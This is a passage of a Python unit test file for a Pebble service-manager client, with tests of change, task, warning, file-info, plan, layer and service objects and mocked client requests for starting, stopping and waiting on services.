spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
),
],
ready=True,
err='Some error',
spawn_time=datetime.datetime.now(),
ready_time=datetime.datetime.now(),
)
error = pebble.ChangeError(change.err, change)
self.assertIsInstance(error, pebble.Error)
self.assertEqual(error.err, 'Some error')
self.assertEqual(error.change, change)
self.assertEqual(str(error), """Some error
----- Logs from task 0 -----
LINE1
LINE2
----- Logs from task 2 -----
single log
-----""")
def test_warning_state(self):
self.assertEqual(list(pebble.WarningState), [
pebble.WarningState.ALL,
pebble.WarningState.PENDING,
])
self.assertEqual(pebble.WarningState.ALL.value, 'all')
self.assertEqual(pebble.WarningState.PENDING.value, 'pending')
def test_change_state(self):
self.assertEqual(list(pebble.ChangeState), [
pebble.ChangeState.ALL,
pebble.ChangeState.IN_PROGRESS,
pebble.ChangeState.READY,
])
self.assertEqual(pebble.ChangeState.ALL.value, 'all')
self.assertEqual(pebble.ChangeState.IN_PROGRESS.value, 'in-progress')
self.assertEqual(pebble.ChangeState.READY.value, 'ready')
def test_system_info_init(self):
info = pebble.SystemInfo(version='1.2.3')
self.assertEqual(info.version, '1.2.3')
def test_system_info_from_dict(self):
info = pebble.SystemInfo.from_dict({'version': '3.2.1'})
self.assertEqual(info.version, '3.2.1')
def test_warning_init(self):
warning = pebble.Warning(
message='Beware!',
first_added=datetime_utc(2021, 1, 1, 1, 1, 1),
last_added=datetime_utc(2021, 1, 26, 2, 3, 4),
last_shown=None,
expire_after='1s',
repeat_after='2s',
)
self.assertEqual(warning.message, 'Beware!')
self.assertEqual(warning.first_added, datetime_utc(2021, 1, 1, 1, 1, 1))
self.assertEqual(warning.last_added, datetime_utc(2021, 1, 26, 2, 3, 4))
self.assertEqual(warning.last_shown, None)
self.assertEqual(warning.expire_after, '1s')
self.assertEqual(warning.repeat_after, '2s')
def test_warning_from_dict(self):
d = {
'message': 'Look out...',
'first-added': '2020-12-25T17:18:54.016273778+13:00',
'last-added': '2021-01-26T17:01:02.12345+13:00',
'expire-after': '1s',
'repeat-after': '2s',
}
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.message, 'Look out...')
self.assertEqual(warning.first_added, datetime_nzdt(2020, 12, 25, 17, 18, 54, 16274))
self.assertEqual(warning.last_added, datetime_nzdt(2021, 1, 26, 17, 1, 2, 123450))
self.assertEqual(warning.last_shown, None)
self.assertEqual(warning.expire_after, '1s')
self.assertEqual(warning.repeat_after, '2s')
d['last-shown'] = None
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.last_shown, None)
d['last-shown'] = '2021-08-04T03:02:01.000000000+13:00'
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.last_shown, datetime_nzdt(2021, 8, 4, 3, 2, 1))
d['first-added'] = '2020-02-03T02:00:40.000000+00:00'
d['last-added'] = '2021-03-04T03:01:41.100000+00:00'
d['last-shown'] = '2022-04-05T06:02:42.200000+00:00'
warning = pebble.Warning.from_dict(d)
self.assertEqual(warning.first_added, datetime_utc(2020, 2, 3, 2, 0, 40, 0))
self.assertEqual(warning.last_added, datetime_utc(2021, 3, 4, 3, 1, 41, 100000))
self.assertEqual(warning.last_shown, datetime_utc(2022, 4, 5, 6, 2, 42, 200000))
def test_task_progress_init(self):
tp = pebble.TaskProgress(label='foo', done=3, total=7)
self.assertEqual(tp.label, 'foo')
self.assertEqual(tp.done, 3)
self.assertEqual(tp.total, 7)
def test_task_progress_from_dict(self):
tp = pebble.TaskProgress.from_dict({
'label': 'foo',
'done': 3,
'total': 7,
})
self.assertEqual(tp.label, 'foo')
self.assertEqual(tp.done, 3)
self.assertEqual(tp.total, 7)
def test_task_id(self):
task_id = pebble.TaskID('1234')
self.assertEqual(task_id, '1234')
def test_task_init(self):
task = pebble.Task(
id=pebble.TaskID('42'),
kind='start',
summary='Start service "svc"',
status='Done',
log=[],
progress=pebble.TaskProgress(label='foo', done=3, total=7),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218),
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158),
)
self.assertEqual(task.id, '42')
self.assertEqual(task.kind, 'start')
self.assertEqual(task.summary, 'Start service "svc"')
self.assertEqual(task.status, 'Done')
self.assertEqual(task.log, [])
self.assertEqual(task.progress.label, 'foo')
self.assertEqual(task.progress.done, 3)
self.assertEqual(task.progress.total, 7)
self.assertEqual(task.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 3, 270218))
self.assertEqual(task.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(task.data, {})
def test_task_from_dict(self):
d = {
"id": "78",
"kind": "start",
"progress": {
"done": 1,
"label": "",
"total": 1,
},
"ready-time": "2021-01-28T14:37:03.270218778+13:00",
"spawn-time": "2021-01-28T14:37:02.247158162+13:00",
"status": "Done",
"summary": 'Start service "svc"',
"data": {"exit-code": 42},
}
task = pebble.Task.from_dict(d)
self.assertEqual(task.id, '78')
self.assertEqual(task.kind, 'start')
self.assertEqual(task.summary, 'Start service "svc"')
self.assertEqual(task.status, 'Done')
self.assertEqual(task.log, [])
self.assertEqual(task.progress.label, '')
self.assertEqual(task.progress.done, 1)
self.assertEqual(task.progress.total, 1)
self.assertEqual(task.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(task.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(task.data, {'exit-code': 42})
d['ready-time'] = '2021-01-28T14:37:03.270218778+00:00'
d['spawn-time'] = '2021-01-28T14:37:02.247158162+00:00'
task = pebble.Task.from_dict(d)
self.assertEqual(task.ready_time, datetime_utc(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(task.spawn_time, datetime_utc(2021, 1, 28, 14, 37, 2, 247158))
def test_change_id(self):
change_id = pebble.ChangeID('1234')
self.assertEqual(change_id, '1234')
def test_change_init(self):
change = pebble.Change(
id=pebble.ChangeID('70'),
kind='autostart',
err='SILLY',
ready=True,
ready_time=datetime_nzdt(2021, 1, 28, 14, 37, 4, 291517),
spawn_time=datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202),
status='Done',
summary='Autostart service "svc"',
tasks=[],
)
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.err, 'SILLY')
self.assertEqual(change.ready, True)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291517))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
self.assertEqual(change.status, 'Done')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.tasks, [])
self.assertEqual(change.data, {})
def test_change_from_dict(self):
d = {
"id": "70",
"kind": "autostart",
"err": "SILLY",
"ready": True,
"ready-time": "2021-01-28T14:37:04.291517768+13:00",
"spawn-time": "2021-01-28T14:37:02.247202105+13:00",
"status": "Done",
"summary": 'Autostart service "svc"',
"tasks": [],
"data": {"exit-code": 42},
}
change = pebble.Change.from_dict(d)
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.err, 'SILLY')
self.assertEqual(change.ready, True)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
self.assertEqual(change.status, 'Done')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.tasks, [])
self.assertEqual(change.data, {'exit-code': 42})
d['ready-time'] = '2021-01-28T14:37:04.291517768+00:00'
d['spawn-time'] = '2021-01-28T14:37:02.247202105+00:00'
change = pebble.Change.from_dict(d)
self.assertEqual(change.ready_time, datetime_utc(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_utc(2021, 1, 28, 14, 37, 2, 247202))
def test_file_type(self):
self.assertEqual(list(pebble.FileType), [
pebble.FileType.FILE,
pebble.FileType.DIRECTORY,
pebble.FileType.SYMLINK,
pebble.FileType.SOCKET,
pebble.FileType.NAMED_PIPE,
pebble.FileType.DEVICE,
pebble.FileType.UNKNOWN,
])
self.assertEqual(pebble.FileType.FILE.value, 'file')
self.assertEqual(pebble.FileType.DIRECTORY.value, 'directory')
self.assertEqual(pebble.FileType.SYMLINK.value, 'symlink')
self.assertEqual(pebble.FileType.SOCKET.value, 'socket')
self.assertEqual(pebble.FileType.NAMED_PIPE.value, 'named-pipe')
self.assertEqual(pebble.FileType.DEVICE.value, 'device')
self.assertEqual(pebble.FileType.UNKNOWN.value, 'unknown')
def test_file_info_init(self):
info = pebble.FileInfo('/etc/hosts', 'hosts', pebble.FileType.FILE, 123, 0o644,
datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518),
12, 'bob', 34, 'staff')
self.assertEqual(info.path, '/etc/hosts')
self.assertEqual(info.name, 'hosts')
self.assertEqual(info.type, pebble.FileType.FILE)
self.assertEqual(info.size, 123)
self.assertEqual(info.permissions, 0o644)
self.assertEqual(info.last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(info.user_id, 12)
self.assertEqual(info.user, 'bob')
self.assertEqual(info.group_id, 34)
self.assertEqual(info.group, 'staff')
def test_file_info_from_dict(self):
d = {
'path': '/etc',
'name': 'etc',
'type': 'directory',
'permissions': '644',
'last-modified': '2021-01-28T14:37:04.291517768+13:00',
}
info = pebble.FileInfo.from_dict(d)
self.assertEqual(info.path, '/etc')
self.assertEqual(info.name, 'etc')
self.assertEqual(info.type, pebble.FileType.DIRECTORY)
self.assertEqual(info.permissions, 0o644)
self.assertEqual(info.last_modified, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertIs(info.user_id, None)
self.assertIs(info.user, None)
self.assertIs(info.group_id, None)
self.assertIs(info.group, None)
d['type'] = 'foobar'
d['size'] = 123
d['user-id'] = 12
d['user'] = 'bob'
d['group-id'] = 34
d['group'] = 'staff'
info = pebble.FileInfo.from_dict(d)
self.assertEqual(info.type, 'foobar')
self.assertEqual(info.size, 123)
self.assertEqual(info.user_id, 12)
self.assertEqual(info.user, 'bob')
self.assertEqual(info.group_id, 34)
self.assertEqual(info.group, 'staff')
class TestPlan(unittest.TestCase):
def test_no_args(self):
with self.assertRaises(TypeError):
pebble.Plan()
def test_services(self):
plan = pebble.Plan('')
self.assertEqual(plan.services, {})
plan = pebble.Plan('services:\n foo:\n override: replace\n command: echo foo')
self.assertEqual(len(plan.services), 1)
self.assertEqual(plan.services['foo'].name, 'foo')
self.assertEqual(plan.services['foo'].override, 'replace')
self.assertEqual(plan.services['foo'].command, 'echo foo')
# Should be read-only ("can't set attribute")
with self.assertRaises(AttributeError):
plan.services = {}
def test_yaml(self):
# Starting with nothing, we get the empty result
plan = pebble.Plan('')
self.assertEqual(plan.to_yaml(), '{}\n')
self.assertEqual(str(plan), '{}\n')
# With a service, we return validated yaml content.
raw = '''\
services:
foo:
override: replace
command: echo foo
'''
plan = pebble.Plan(raw)
reformed = yaml.safe_dump(yaml.safe_load(raw))
self.assertEqual(plan.to_yaml(), reformed)
self.assertEqual(str(plan), reformed)
def test_service_equality(self):
plan = pebble.Plan('')
self.assertEqual(plan.services, {})
plan = pebble.Plan('services:\n foo:\n override: replace\n command: echo foo')
old_service = pebble.Service(name="foo",
raw={
"override": "replace",
"command": "echo foo"
})
old_services = {"foo": old_service}
self.assertEqual(plan.services, old_services)
services_as_dict = {
"foo": {"override": "replace", "command": "echo foo"}
}
self.assertEqual(plan.services, services_as_dict)
class TestLayer(unittest.TestCase):
def _assert_empty(self, layer):
self.assertEqual(layer.summary, '')
self.assertEqual(layer.description, '')
self.assertEqual(layer.services, {})
self.assertEqual(layer.to_dict(), {})
def test_no_args(self):
s = pebble.Layer()
self._assert_empty(s)
def test_dict(self):
s = pebble.Layer({})
self._assert_empty(s)
d = {
'summary': 'Sum Mary',
'description': 'The quick brown fox!',
'services': {
'foo': {
'summary': 'Foo',
'command': 'echo foo',
},
'bar': {
'summary': 'Bar',
'command': 'echo bar',
},
}
}
s = pebble.Layer(d)
self.assertEqual(s.summary, 'Sum Mary')
self.assertEqual(s.description, 'The quick brown fox!')
self.assertEqual(s.services['foo'].name, 'foo')
self.assertEqual(s.services['foo'].summary, 'Foo')
self.assertEqual(s.services['foo'].command, 'echo foo')
self.assertEqual(s.services['bar'].name, 'bar')
self.assertEqual(s.services['bar'].summary, 'Bar')
self.assertEqual(s.services['bar'].command, 'echo bar')
self.assertEqual(s.to_dict(), d)
def test_yaml(self):
s = pebble.Layer('')
self._assert_empty(s)
yaml = """description: The quick brown fox!
services:
bar:
command: echo bar
environment:
ENV1: value1
ENV2: value2
group: staff
group-id: 2000
summary: Bar
user: bob
user-id: 1000
foo:
command: echo foo
summary: Foo
summary: Sum Mary
"""
s = pebble.Layer(yaml)
self.assertEqual(s.summary, 'Sum Mary')
self.assertEqual(s.description, 'The quick brown fox!')
self.assertEqual(s.services['foo'].name, 'foo')
self.assertEqual(s.services['foo'].summary, 'Foo')
self.assertEqual(s.services['foo'].command, 'echo foo')
self.assertEqual(s.services['bar'].name, 'bar')
self.assertEqual(s.services['bar'].summary, 'Bar')
self.assertEqual(s.services['bar'].command, 'echo bar')
self.assertEqual(s.services['bar'].environment,
{'ENV1': 'value1', 'ENV2': 'value2'})
self.assertEqual(s.services['bar'].user, 'bob')
self.assertEqual(s.services['bar'].user_id, 1000)
self.assertEqual(s.services['bar'].group, 'staff')
self.assertEqual(s.services['bar'].group_id, 2000)
self.assertEqual(s.to_yaml(), yaml)
self.assertEqual(str(s), yaml)
def test_layer_service_equality(self):
s = pebble.Layer({})
self._assert_empty(s)
d = {
'summary': 'Sum Mary',
'description': 'The quick brown fox!',
'services': {
'foo': {
'summary': 'Foo',
'command': 'echo foo',
},
'bar': {
'summary': 'Bar',
'command': 'echo bar',
},
}
}
s = pebble.Layer(d)
t = pebble.Layer(d)
self.assertEqual(s.services, t.services)
class TestService(unittest.TestCase):
def _assert_empty(self, service, name):
self.assertEqual(service.name, name)
self.assertEqual(service.summary, '')
self.assertEqual(service.description, '')
self.assertEqual(service.startup, '')
self.assertEqual(service.override, '')
self.assertEqual(service.command, '')
self.assertEqual(service.after, [])
self.assertEqual(service.before, [])
self.assertEqual(service.requires, [])
self.assertEqual(service.environment, {})
self.assertEqual(service.user, '')
self.assertIs(service.user_id, None)
self.assertEqual(service.group, '')
self.assertIs(service.group_id, None)
self.assertEqual(service.to_dict(), {})
def test_name_only(self):
s = pebble.Service('Name 0')
self._assert_empty(s, 'Name 0')
def test_dict(self):
s = pebble.Service('Name 1', {})
self._assert_empty(s, 'Name 1')
d = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
s = pebble.Service('Name 2', d)
self.assertEqual(s.name, 'Name 2')
self.assertEqual(s.description, 'The lazy quick brown')
self.assertEqual(s.startup, 'Start Up')
self.assertEqual(s.override, 'override')
self.assertEqual(s.command, 'echo sum mary')
self.assertEqual(s.after, ['a1', 'a2'])
self.assertEqual(s.before, ['b1', 'b2'])
self.assertEqual(s.requires, ['r1', 'r2'])
self.assertEqual(s.environment, {'k1': 'v1', 'k2': 'v2'})
self.assertEqual(s.user, 'bob')
self.assertEqual(s.user_id, 1000)
self.assertEqual(s.group, 'staff')
self.assertEqual(s.group_id, 2000)
self.assertEqual(s.to_dict(), d)
# Ensure pebble.Service has made copies of mutable objects
s.after.append('a3')
s.before.append('b3')
s.requires.append('r3')
s.environment['k3'] = 'v3'
self.assertEqual(s.after, ['a1', 'a2', 'a3'])
self.assertEqual(s.before, ['b1', 'b2', 'b3'])
self.assertEqual(s.requires, ['r1', 'r2', 'r3'])
self.assertEqual(s.environment, {'k1': 'v1', 'k2': 'v2', 'k3': 'v3'})
self.assertEqual(d['after'], ['a1', 'a2'])
self.assertEqual(d['before'], ['b1', 'b2'])
self.assertEqual(d['requires'], ['r1', 'r2'])
self.assertEqual(d['environment'], {'k1': 'v1', 'k2': 'v2'})
def test_equality(self):
d = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
one = pebble.Service("Name 1", d)
two = pebble.Service("Name 1", d)
self.assertEqual(one, two)
as_dict = {
'summary': 'Sum Mary',
'description': 'The lazy quick brown',
'startup': 'Start Up',
'override': 'override',
'command': 'echo sum mary',
'after': ['a1', 'a2'],
'before': ['b1', 'b2'],
'requires': ['r1', 'r2'],
'environment': {'k1': 'v1', 'k2': 'v2'},
'user': 'bob',
'user-id': 1000,
'group': 'staff',
'group-id': 2000,
}
self.assertEqual(one, as_dict)
class TestServiceInfo(unittest.TestCase):
def test_service_startup(self):
self.assertEqual(list(pebble.ServiceStartup), [
pebble.ServiceStartup.ENABLED,
pebble.ServiceStartup.DISABLED,
])
self.assertEqual(pebble.ServiceStartup.ENABLED.value, 'enabled')
self.assertEqual(pebble.ServiceStartup.DISABLED.value, 'disabled')
def test_service_status(self):
self.assertEqual(list(pebble.ServiceStatus), [
pebble.ServiceStatus.ACTIVE,
pebble.ServiceStatus.INACTIVE,
pebble.ServiceStatus.ERROR,
])
self.assertEqual(pebble.ServiceStatus.ACTIVE.value, 'active')
self.assertEqual(pebble.ServiceStatus.INACTIVE.value, 'inactive')
self.assertEqual(pebble.ServiceStatus.ERROR.value, 'error')
def test_service_info(self):
s = pebble.ServiceInfo('svc1', pebble.ServiceStartup.ENABLED, pebble.ServiceStatus.ACTIVE)
self.assertEqual(s.name, 'svc1')
self.assertEqual(s.startup, pebble.ServiceStartup.ENABLED)
self.assertEqual(s.current, pebble.ServiceStatus.ACTIVE)
s = pebble.ServiceInfo.from_dict({
'name': 'svc2',
'startup': 'disabled',
'current': 'inactive',
})
self.assertEqual(s.name, 'svc2')
self.assertEqual(s.startup, pebble.ServiceStartup.DISABLED)
self.assertEqual(s.current, pebble.ServiceStatus.INACTIVE)
s = pebble.ServiceInfo.from_dict({
'name': 'svc2',
'startup': 'thingy',
'current': 'bob',
})
self.assertEqual(s.name, 'svc2')
self.assertEqual(s.startup, 'thingy')
self.assertEqual(s.current, 'bob')
def test_is_running(self):
s = pebble.ServiceInfo('s', pebble.ServiceStartup.ENABLED, pebble.ServiceStatus.ACTIVE)
self.assertTrue(s.is_running())
for current in [pebble.ServiceStatus.INACTIVE, pebble.ServiceStatus.ERROR, 'other']:
s = pebble.ServiceInfo('s', pebble.ServiceStartup.ENABLED, current)
self.assertFalse(s.is_running())
class MockClient(pebble.Client):
"""Mock Pebble client that simply records requests and returns stored responses."""
def __init__(self):
self.requests = []
self.responses = []
self.timeout = 5
self.websockets = {}
def _request(self, method, path, query=None, body=None):
self.requests.append((method, path, query, body))
resp = self.responses.pop(0)
if isinstance(resp, Exception):
raise resp
if callable(resp):
resp = resp()
return resp
def _request_raw(self, method, path, query=None, headers=None, data=None):
self.requests.append((method, path, query, headers, data))
headers, body = self.responses.pop(0)
return MockHTTPResponse(headers, body)
def _connect_websocket(self, task_id, websocket_id):
return self.websockets[task_id, websocket_id]
class MockHTTPResponse:
def __init__(self, headers, body):
self.headers = headers
reader = io.BytesIO(body)
self.read = reader.read
class MockTime:
"""Mocked versions of time.time() and time.sleep().
MockTime.sleep() advances the clock and MockTime.time() returns the current time.
"""
def __init__(self):
self._time = 0
def time(self):
return self._time
def sleep(self, delay):
self._time += delay
def build_mock_change_dict(change_id='70'):
return {
"id": change_id,
"kind": "autostart",
"ready": True,
"ready-time": "2021-01-28T14:37:04.291517768+13:00",
"spawn-time": "2021-01-28T14:37:02.247202105+13:00",
"status": "Done",
"summary": 'Autostart service "svc"',
"tasks": [
{
"id": "78",
"kind": "start",
"progress": {
"done": 1,
"label": "",
"total": 1,
"extra-field": "foo",
},
"ready-time": "2021-01-28T14:37:03.270218778+13:00",
"spawn-time": "2021-01-28T14:37:02.247158162+13:00",
"status": "Done",
"summary": 'Start service "svc"',
"extra-field": "foo",
},
],
"extra-field": "foo",
}
class TestClient(unittest.TestCase):
maxDiff = None
def setUp(self):
self.client = MockClient()
self.time = MockTime()
time_patcher = unittest.mock.patch('ops.pebble.time', self.time)
time_patcher.start()
self.addCleanup(time_patcher.stop)
def test_client_init(self):
pebble.Client(socket_path='foo') # test that constructor runs
with self.assertRaises(ValueError):
pebble.Client() # socket_path arg required
def test_get_system_info(self):
self.client.responses.append({
"result": {
"version": "1.2.3",
"extra-field": "foo",
},
"status": "OK",
"status-code": 200,
"type": "sync"
})
info = self.client.get_system_info()
self.assertEqual(info.version, '1.2.3')
self.assertEqual(self.client.requests, [
('GET', '/v1/system-info', None, None),
])
def test_get_warnings(self):
empty = {
"result": [],
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(empty)
warnings = self.client.get_warnings()
self.assertEqual(warnings, [])
self.client.responses.append(empty)
warnings = self.client.get_warnings(select=pebble.WarningState.ALL)
self.assertEqual(warnings, [])
self.assertEqual(self.client.requests, [
('GET', '/v1/warnings', {'select': 'pending'}, None),
('GET', '/v1/warnings', {'select': 'all'}, None),
])
def test_ack_warnings(self):
self.client.responses.append({
"result": 0,
"status": "OK",
"status-code": 200,
"type": "sync"
})
num = self.client.ack_warnings(datetime_nzdt(2021, 1, 28, 15, 11, 0))
self.assertEqual(num, 0)
self.assertEqual(self.client.requests, [
('POST', '/v1/warnings', None, {
'action': 'okay',
'timestamp': '2021-01-28T15:11:00+13:00',
}),
])
def assert_mock_change(self, change):
self.assertEqual(change.id, '70')
self.assertEqual(change.kind, 'autostart')
self.assertEqual(change.summary, 'Autostart service "svc"')
self.assertEqual(change.status, 'Done')
self.assertEqual(len(change.tasks), 1)
self.assertEqual(change.tasks[0].id, '78')
self.assertEqual(change.tasks[0].kind, 'start')
self.assertEqual(change.tasks[0].summary, 'Start service "svc"')
self.assertEqual(change.tasks[0].status, 'Done')
self.assertEqual(change.tasks[0].log, [])
self.assertEqual(change.tasks[0].progress.done, 1)
self.assertEqual(change.tasks[0].progress.label, '')
self.assertEqual(change.tasks[0].progress.total, 1)
self.assertEqual(change.tasks[0].ready_time,
datetime_nzdt(2021, 1, 28, 14, 37, 3, 270219))
self.assertEqual(change.tasks[0].spawn_time,
datetime_nzdt(2021, 1, 28, 14, 37, 2, 247158))
self.assertEqual(change.ready, True)
self.assertEqual(change.err, None)
self.assertEqual(change.ready_time, datetime_nzdt(2021, 1, 28, 14, 37, 4, 291518))
self.assertEqual(change.spawn_time, datetime_nzdt(2021, 1, 28, 14, 37, 2, 247202))
def test_get_changes(self):
empty = {
"result": [],
"status": "OK",
"status-code": 200,
"type": "sync"
}
self.client.responses.append(empty)
changes = self.client.get_changes()
self.assertEqual(changes, [])
self.client.responses.append(empty)
changes = self.client.get_changes(select=pebble.ChangeState.ALL)
self.assertEqual(changes, [])
self.client.responses.append(empty)
changes = self.client.get_changes(select=pebble.ChangeState.ALL, service='foo')
self.assertEqual(changes, [])
self.client.responses.append({
"result": [
build_mock_change_dict(),
],
"status": "OK",
"status-code": 200,
"type": "sync"
})
changes = self.client.get_changes()
self.assertEqual(len(changes), 1)
self.assert_mock_change(changes[0])
self.assertEqual(self.client.requests, [
('GET', '/v1/changes', {'select': 'in-progress'}, None),
('GET', '/v1/changes', {'select': 'all'}, None),
('GET', '/v1/changes', {'select': 'all', 'for': 'foo'}, None),
('GET', '/v1/changes', {'select': 'in-progress'}, None),
])
def test_get_change(self):
self.client.responses.append({
"result": build_mock_change_dict(),
"status": "OK",
"status-code": 200,
"type": "sync"
})
change = self.client.get_change('70')
self.assert_mock_change(change)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70', None, None),
])
def test_abort_change(self):
self.client.responses.append({
"result": build_mock_change_dict(),
"status": "OK",
"status-code": 200,
"type": "sync"
})
change = self.client.abort_change('70')
self.assert_mock_change(change)
self.assertEqual(self.client.requests, [
('POST', '/v1/changes/70', None, {'action': 'abort'}),
])
def _services_action_helper(self, action, api_func, services):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change = build_mock_change_dict()
change['ready'] = True
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
change_id = api_func()
self.assertEqual(change_id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': action, 'services': services}),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def _services_action_async_helper(self, action, api_func, services):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change_id = api_func(timeout=0)
self.assertEqual(change_id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': action, 'services': services}),
])
def test_autostart_services(self):
self._services_action_helper('autostart', self.client.autostart_services, [])
def test_autostart_services_async(self):
self._services_action_async_helper('autostart', self.client.autostart_services, [])
def test_replan_services(self):
self._services_action_helper('replan', self.client.replan_services, [])
def test_replan_services_async(self):
self._services_action_async_helper('replan', self.client.replan_services, [])
def test_start_services(self):
def api_func():
return self.client.start_services(['svc'])
self._services_action_helper('start', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.start_services(1)
with self.assertRaises(TypeError):
self.client.start_services([1])
with self.assertRaises(TypeError):
self.client.start_services([['foo']])
def test_start_services_async(self):
def api_func(timeout=30):
return self.client.start_services(['svc'], timeout=timeout)
self._services_action_async_helper('start', api_func, ['svc'])
def test_stop_services(self):
def api_func():
return self.client.stop_services(['svc'])
self._services_action_helper('stop', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.stop_services(1)
with self.assertRaises(TypeError):
self.client.stop_services([1])
with self.assertRaises(TypeError):
self.client.stop_services([['foo']])
def test_stop_services_async(self):
def api_func(timeout=30):
return self.client.stop_services(['svc'], timeout=timeout)
self._services_action_async_helper('stop', api_func, ['svc'])
def test_restart_services(self):
def api_func():
return self.client.restart_services(['svc'])
self._services_action_helper('restart', api_func, ['svc'])
with self.assertRaises(TypeError):
self.client.restart_services(1)
with self.assertRaises(TypeError):
self.client.restart_services([1])
with self.assertRaises(TypeError):
self.client.restart_services([['foo']])
def test_restart_services_async(self):
def api_func(timeout=30):
return self.client.restart_services(['svc'], timeout=timeout)
self._services_action_async_helper('restart', api_func, ['svc'])
def test_change_error(self):
self.client.responses.append({
"change": "70",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
change = build_mock_change_dict()
change['err'] = 'Some kind of service error'
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
with self.assertRaises(pebble.ChangeError) as cm:
self.client.autostart_services()
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.err, 'Some kind of service error')
self.assertIsInstance(cm.exception.change, pebble.Change)
self.assertEqual(cm.exception.change.id, '70')
self.assertEqual(self.client.requests, [
('POST', '/v1/services', None, {'action': 'autostart', 'services': []}),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_success(self, timeout=30.0):
change = build_mock_change_dict()
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70', timeout=timeout)
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_success_timeout_none(self):
self.test_wait_change_success(timeout=None)
def test_wait_change_success_multiple_calls(self):
def timeout_response(n):
self.time.sleep(n) # simulate passing of time due to wait_change call
raise pebble.APIError({}, 504, "Gateway Timeout", "timed out")
self.client.responses.append(lambda: timeout_response(4))
change = build_mock_change_dict()
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70')
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(self.time.time(), 4)
def test_wait_change_success_polled(self, timeout=30.0):
# Trigger polled mode
self.client.responses.append(pebble.APIError({}, 404, "Not Found", "not found"))
for i in range(3):
change = build_mock_change_dict()
change['ready'] = i == 2
self.client.responses.append({
"result": change,
"status": "OK",
"status-code": 200,
"type": "sync"
})
response = self.client.wait_change('70', timeout=timeout, delay=1)
self.assertEqual(response.id, '70')
self.assertTrue(response.ready)
self.assertEqual(self.client.requests, [
('GET', '/v1/changes/70/wait', {'timeout': '4.000s'}, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
('GET', '/v1/changes/70', None, None),
])
self.assertEqual(self.time.time(), 2)
def test_wait_change_success_polled_timeout_none(self):
self.test_wait_change_success_polled(timeout=None)
def test_wait_change_timeout(self):
def timeout_response(n):
self.time.sleep(n) # simulate passing of time due to wait_change call
raise pebble.APIError({}, 504, "Gateway Timeout", "timed out")
self.client.responses.append(lambda: timeout_response(4))
self.client.responses.append(lambda: timeout_response(2))
with self.assertRaises(pebble.TimeoutError) as cm:
self.client.wait_change('70', timeout=6)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertIsInstance(cm.exception, TimeoutError)
